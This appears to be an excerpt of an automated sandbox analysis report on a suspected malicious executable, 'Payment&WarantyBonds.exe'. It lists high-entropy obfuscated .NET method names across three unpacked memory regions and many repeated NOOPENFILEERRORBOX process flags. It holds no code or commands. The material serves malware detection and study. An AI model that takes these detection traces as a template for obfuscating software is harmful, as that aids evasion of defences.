Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, AADQktakk8MTMyie6y.cs	High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs	High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, ABxuR4jclTb0QJbmgq0.cs	High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, NrmpeS2PNSGs7X0CKD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, lEe6OTuveACY3rt9Ok.cs	High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, RujqcAN6TG7qku38oo.cs	High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, Qcbo1atUNRX5uYhT4D.cs	High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, MnUca67wwyq9isAD8V.cs	High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, JFv6NDqobKO3oP7PJ5.cs	High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, uLGJVHvUgM9ulOmn62.cs	High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, uPpMvls1PHjFnvTcDG.cs	High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, hsiK9PiqZrfnl6rMvi.cs	High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, c3QNNUoubAttVxH9S2.cs	High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs	High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, CGdMn0bkxNbGSKYFA0.cs	High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, ioi8Rkz6CpkkqYwguL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, jfce7djWOMMimZwhZQb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs	High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, qtiCGhV5g3bg8x5VxE.cs	High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, HYqHWc4dupAKCWiUdf.cs	High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, HAAlopX3s3btnJ7UlG.cs	High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, AADQktakk8MTMyie6y.cs	High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs	High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, ABxuR4jclTb0QJbmgq0.cs	High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, NrmpeS2PNSGs7X0CKD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, lEe6OTuveACY3rt9Ok.cs	High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, RujqcAN6TG7qku38oo.cs	High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, Qcbo1atUNRX5uYhT4D.cs	High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, MnUca67wwyq9isAD8V.cs	High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, JFv6NDqobKO3oP7PJ5.cs	High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, uLGJVHvUgM9ulOmn62.cs	High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, uPpMvls1PHjFnvTcDG.cs	High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, hsiK9PiqZrfnl6rMvi.cs	High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, c3QNNUoubAttVxH9S2.cs	High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs	High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, CGdMn0bkxNbGSKYFA0.cs	High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, ioi8Rkz6CpkkqYwguL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, jfce7djWOMMimZwhZQb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs	High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, qtiCGhV5g3bg8x5VxE.cs	High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, HYqHWc4dupAKCWiUdf.cs	High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, HAAlopX3s3btnJ7UlG.cs	High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, AADQktakk8MTMyie6y.cs	High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs	High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, ABxuR4jclTb0QJbmgq0.cs	High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, NrmpeS2PNSGs7X0CKD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, lEe6OTuveACY3rt9Ok.cs	High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, RujqcAN6TG7qku38oo.cs	High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, Qcbo1atUNRX5uYhT4D.cs	High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, MnUca67wwyq9isAD8V.cs	High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, JFv6NDqobKO3oP7PJ5.cs	High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, uLGJVHvUgM9ulOmn62.cs	High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, uPpMvls1PHjFnvTcDG.cs	High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, hsiK9PiqZrfnl6rMvi.cs	High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, c3QNNUoubAttVxH9S2.cs	High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs	High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, CGdMn0bkxNbGSKYFA0.cs	High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, ioi8Rkz6CpkkqYwguL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, jfce7djWOMMimZwhZQb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, cILh9bHvx4dPN3VnUI.cs	High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, qtiCGhV5g3bg8x5VxE.cs	High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, HYqHWc4dupAKCWiUdf.cs	High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
